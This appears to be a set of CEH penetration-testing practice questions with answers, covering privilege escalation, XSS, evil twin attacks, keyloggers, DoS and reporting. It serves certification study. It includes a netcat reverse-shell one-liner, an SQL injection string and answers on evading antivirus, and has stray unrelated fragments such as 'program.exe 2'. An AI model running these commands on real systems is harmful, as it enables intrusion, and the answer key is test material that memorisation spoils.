CEH Ch6 - Ch 9
8-10 You've searched a Linux system for programs with special permissions set, and found a number owned by root. Which of the following might you be able to abuse for privilege escalation? Choose all that apply.
-rwxr-sr-x. 1 root root 55416 Feb 9 2019 settest; -rwsr-xr-x. 1 root root 421992 Apr 15 2018 secoptd; -rwsr-sr-x. 1 root root 8312 Mar 10 2019 rndetect
multimedia.exe
1
7-1 You're designing an exploit script that begins by sending long string of numbers sent to a field that's only supposed to hold a four-digit variable. What kind of vulnerability are you targeting? Choose the best response.
Buffer overflow
7-6 While preparing for a web application penetration test, you're researching a recent XSS attack against a similar application. The developer showed you the JavaScript code used to sanitize and validate input in the browser; you're not really a coder, but, it seems like it would have prevented the attack. What is the most likely reason the web application was vulnerable? Choose the best response.
Client-side validation can be easily bypassed.
8-3 You've found a running file server filled with sensitive data, but the local login interface is protected by a strong password and the drive has full-disk encryption. What kind of attack might give you access to the file system? Choose the best response.
Cold boot
8-16 To achieve your testing goal, you need to maintain access for two weeks, then clean up your tracks in time for an internal security audit a week later. Ideally, there should be no sign an attack had even occurred.. Which element of your draft plan should you probably change? Choose the best response
Completely wipe system logs before you leave
8-14 You've deployed a remote access Trojan on several computers in the target network, but it keeps getting discovered by antivirus scanners and deleted. What options would allow you to evade detection and maintain the backdoor? Choose all that apply.
Create a scheduled task; Install a rootkit instead
8-4 What kind of specialized system is most likely to run an off-the-shelf workstation operating system with custom applications installed? Choose the best answer.
POS
8-1 A factory production line is controlled by specialized expansion cards on an old PC. Compatibility with those cards and their control software requires an outdated operating system that's no longer receiving security updates. Which of the following controls would make it hardest for you to exploit the system? Choose the best response.
Placement on an isolated secure network
6-4 Which of the following attacks primarily targets vulnerable switches? Choose the best reply.
VLAN hopping
8-13 Which of the following remote access protocols both provides GUI access and isn't tied to a specific operating system? Choose the best response.
VNC
6-11 You've enumerated a number of WAPs with different security settings, and you suspect that all of them have old firmware. Which of the following could target with a Pixie Dust attack? Choose all that apply
WPA-PSK with TKIP encryption, WPS enabled; WPA2-PSK with CCMP encryption, WPS enabled; WPA2-PSK with CCMP or TKIP encryption, WPS enabled
8-15You're trying to perform lateral movement through a Windows network. The teammate who performed the network scans earlier in the test noted that TCP ports 5985 and 5986 were open for remote management on a number of workstations. What remote access program would you use to target those ports? Choose the best answer.
WinRM
6-6 Which of the following statements about ARP poisoning is not actually true? Choose the best answer.
You can target hosts but not switches.
8-5 You've gained access to a server through a network exploit, but you're not sure if it's a physical host or virtual machine. What commands could you use to verify that the server is a VM? Choose all that apply for either Linux or Windows
ifconfig; systemd-detect-virt; wmic baseboard get manufacturer,product
8-6 You found an exploit that lets you issue a system command on a Linux server, and you already control a Windows computer listening for connections on port 80. Which of the following NETCAT commands will open a reverse shell connection to your Windows listener? Choose the best response.
nc 10.10.10.150 80 -e /bin/bash
8-12 You've achieved administrator privileges on a Windows computer, and now you want to create some local users from PowerShell. Which command is the easiest way to do it? Choose the best response.
net
8-7 You've successfully created a NETCAT reverse shell. Which of the following can you use without first performing a shell upgrade? Choose all valid answers..
python; sudo
6-9 You want to try cloning the target organization's RFID badges. You haven't been able to inspect one close up, but you heard someone say they work up to 50 cm and are can't be used with NFC devices because they're a different frequency. What frequency range should you get a reader for? Choose the best response.
125-134 kHz
program.exe
2
sequence.exe
3
alpcaca.exe
4
alpserv.exe
5
server.exe
6
8-8 You want to install keyloggers on a number of workstations in order to capture login credentials for the servers you're really targeting. You're trying to decide between on a case by case basis between software keyloggers that email captured input and hardware keyloggers which store input in flash memory. For which of the following is a hardware keylogger definitely a bad idea? Choose all that apply.
A reception desk computer is positioned with its back panel facing anyone who comes up to the desk.; You'll be able to access a file room computer easily during some scheduled facilities repair work, but after that you don't know if you'll be able to access the basement it's in.
9-7 The target environment isn't subject to any specific industry regulations, but the client wants strong security policies which don't violate NIST guidelines where possible. You've discovered a system with very weak password policies. Which recommendations will you include? Choose all that apply.
Accounts should be temporarily locked after five failed login attempts; New passwords should be checked against a database of weak and compromised passwords before approval; Self-service password resets should be verified through a reset link sent to the user's registered email address
9-3 Which of the following is not a component of a DREAD score? Choose the best response.
Availability
6-10 You found a tool designed to wirelessly steal contact lists from the older phones used by some employees at the target organization/ What kind of attack is it? Choose the best response.
Bluesnarfing
6-1 You just found an unexpected configuration change in a router's DHCP server. It now directs all connecting clients to use a non-standard, unauthorized DNS server. What kind of attack do you suspect? Choose the best response.
DNS hijacking
7-9 You got a hold of some memos exchanged during the development of a web application you're targeting. The lead developer assured the CISO that with the new input sanitization routines the front-end server won't allow executable scripts to be stored in the database. What kind of XSS attacks might you still be able to try? Choose all that apply.
DOM based; Reflective
7-4 You find that a web application stores secret session information in a hidden element within the browser. It's not visible to the user, but it's easy to extract with a client-side attack. What sort of information exposure are you targeting? Choose the best answer.
Document Object Model
6-7 The Z-Shave attack is an example of what kind of attack? Choose the best answer.
Downgrade
7-5 You're examining a program's behavior under non-standard conditions, and looking for vulnerabilities to exploit. Which of the following would be most useful in an attack? Pick the best answer.
Errors are accompanied by verbose messages explaining exactly what went wrong.
6-3 Users are reporting a server responding slowly in what sounds like a high network load, but overall traffic to the server isn't high enough to explain the problem. What evidence can you look for in that traffic to find out if it's a network DoS attack? Choose all that apply.
Excessive SYN packets; Malformed packets
9-2 The client prefers to use quantitative risk assessments. Which model would better fit your report? Choose the best response.
FAIR
9-9 A web application you tested has serious SQL injection vulnerabilities, and another was extremely secure. You're recommending that the client use the secure application's security model to improve the insecure one. One feature on the secure application is that the SQL server itself passes input from the application server into precompiled SQL statements, while the insecure one dynamically generates them. What specific recommendation will you put in your report? Choose the best reply.
Implement parameterized queries
7-8 A teammate supplies you with an automated attack script for a web application. Browsing the script you see it has an input string containing 1' OR '1'='1. What kind of attack does this most likely indicate? Choose the best response.
Injection
7-7 You're reviewing a web application for a white box test. Which of these features might you be able to exploit? Choose all that apply.
Input errors are logged and clearly displayed to users in full detail.; Input validation is performed more rigorously on the client side than the server side.; Secret cookies are used to prevent XSRF attacks.
6-8 You can't get close enough to the facility interior to launch an evil twin attack against its wireless clients; in fact, you haven't even discovered their SSIDs. What you have discovered is a number of employees eating lunch in a park outside on warm afternoons. What kind of evil twin attack can target those users' laptops and smartphones? Choose the best reply
Karma
9-8 You discover that all Windows systems in the target Active Directory network are configured with the same local administrator password. What tool should you recommend the client use to correct the issue? Choose the best response.
LAPS
8-11 You saw a teammate retrieve credentials from a Windows 7 machine using the procdumpcommand. Where were they probably stored? Choose the best response.
LSASS
9-10 Which follow-up step will be affected least by a client's individual requirements? Choose the best reply.
Lessons learned meeting
6.2 You want to perform a DoS attack against a database server, but doing it through sheer packet volume isn't really practical or desirable. Which DoS techniques might you try? Choose all that apply.
Low and slow; SYN flood; Teardrop attack
8-2 Which operating system offers server features as an add-on package for the standard workstation product? Choose the best response.
MacOS
9-4 What part of the report is the most appropriate place to explain the metrics you use to calculate risk?
Methodology
7-3 The target organization has workstations configured to check all applications for code signatures. What attack types will that make more difficult? Choose all that apply.
Modified and recompiled applications; Trojan horses
7-2 A security blog you read just published an application exploit that allows privilege escalation via a series of normal data inputs, with a specific sequence and timing? What kind of vulnerability does it target? Choose the best response.
Race condition
6-5 On a wired network, what protocols are generally targeted by downgrade attacks? Choose all that apply.
SSL; TLS
7-10 You plan to perform a session hijacking attack by sending the victim a link to a legitimate application, but which logs in with a session ID of your choosing. What kind of attack are you performing? Choose the best answer.
Session fixation
9-6 You're recommending that the client implement two-factor authentication on a high security system. Which of the following would qualify? Choose all that apply.
Smart card and fingerprint scan; Password and iris scan; Password and OTP
9-1 Which of the following are good guidelines for writing an executive summary? Choose all that apply.
Summarize the high priority findings; Include recommended actions; Keep it under two pages
9-5 During the planning phase of a penetration test you review a draft document for report presentation. Which clauses should you suggest changing before it goes to the client for approval? Choose all that apply.
The final report will be distributed by email to stakeholders who cannot attend the formal meeting.; After the engagement, both parties will retain the full report results for as long as the target network remains in service.
